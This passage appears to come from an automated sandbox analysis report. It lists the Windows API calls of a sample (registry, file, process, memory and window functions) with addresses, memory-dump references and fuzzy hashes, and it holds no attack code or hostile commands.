                                                                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 296031713-0
                                                                                                    APIs
                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                    • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 2818636725-0
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2919029540-0
                                                                                                    • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                    • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                    • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                    • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
• Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EEF3
• EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Thread$CurrentEnumWindows
• String ID:
• API String ID: 2396873506-0
• Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
• Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
• GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
• Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
• Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
• Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
• GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
• Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
• Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
• Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 00423249
• LoadCursorA.USER32(00000000,00000000), ref: 00423273
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
• Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
• Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
• Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E39E
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
• Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
• Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
• Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
APIs
• SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
• CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: FolderFreeKnownPathTask
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 969438705-544719455
• Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
• Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
• Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
• Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
• Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
• Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
• Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                      • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                      • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1658689577-0
                                                                                                    • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                    • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                    • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                    • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                    APIs
                                                                                                    • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoScroll
                                                                                                    • String ID:
                                                                                                    • API String ID: 629608716-0
                                                                                                    • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                    • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                    • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                    • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                      • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                    • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                      • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                      • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3319771486-0
                                                                                                    • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                    • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                    • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                    • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                    • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                    • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                    • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                    • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                    • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                    • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                    • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                    • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                    • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                    • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                    • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                    • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                    • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                                    • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                                    • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
